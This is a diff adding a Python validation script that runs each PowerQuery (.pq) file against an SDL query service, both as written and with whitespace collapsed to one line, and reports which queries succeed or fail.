+from __future__ import annotations
+
+import re
+import sys
+import time
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query  # noqa: E402
+
+PQ_DIR = ROOT / "pq"
+files = sorted(PQ_DIR.glob("*.pq"))
+
+
+def strip_comments(text: str) -> str:
+    return "\n".join(l for l in text.splitlines()
+                     if not l.lstrip().startswith("//")).strip()
+
+
+def collapse_whitespace(body: str) -> str:
+    """Single-line form: same query, all whitespace collapsed to one space.
+
+    This simulates what happens when a user pastes the query into a web
+    textbox that strips newlines. A correctly-formatted PQ must survive
+    this transformation — every `|` between stages must be present.
+    """
+    return re.sub(r"\s+", " ", body).strip()
+
+
+print(f"Verifying {len(files)} .pq files run cleanly on SDL ...")
+print("(Each file tested in TWO forms: as-written and whitespace-collapsed.)")
+print()
+
+passed: list[str] = []
+failed: list[tuple[str, str, str]] = []  # (file, variant, reason)
+
+
+def run(name: str, variant: str, body: str) -> bool:
+    t0 = time.time()
+    try:
+        r = power_query(body, start_time="2h")
+    except Exception as e:
+        failed.append((name, variant, f"exception: {e}"))
+        return False
+    elapsed = time.time() - t0
+    status = r.get("status", "")
+    if status == "success":
+        matching = r.get("matchingEvents", 0)
+        print(f"  ✓ {name:<48} [{variant:<9}] "
+              f"matching={matching} ({elapsed:.1f}s)")
+        return True
+    msg = r.get("message", "")[:200]
+    print(f"  ✗ {name:<48} [{variant:<9}] {status} :: {msg}")
+    failed.append((name, variant, f"{status}: {msg}"))
+    return False
+
+
+for f in files:
+    text = f.read_text()
+    body = strip_comments(text)
+    if not body:
+        failed.append((f.name, "as-written", "empty after stripping comments"))
+        continue
+
+    ok1 = run(f.name, "as-written", body)
+    ok2 = run(f.name, "collapsed", collapse_whitespace(body))
+    if ok1 and ok2:
+        passed.append(f.name)
+
+print()
+print(f"PASS: {len(passed)}    FAIL: {len(failed)}")
+if failed:
+    print()
+    print("Failed queries:")
+    for name, variant, why in failed:
+        print(f"  {name} [{variant}]: {why}")
+    sys.exit(1)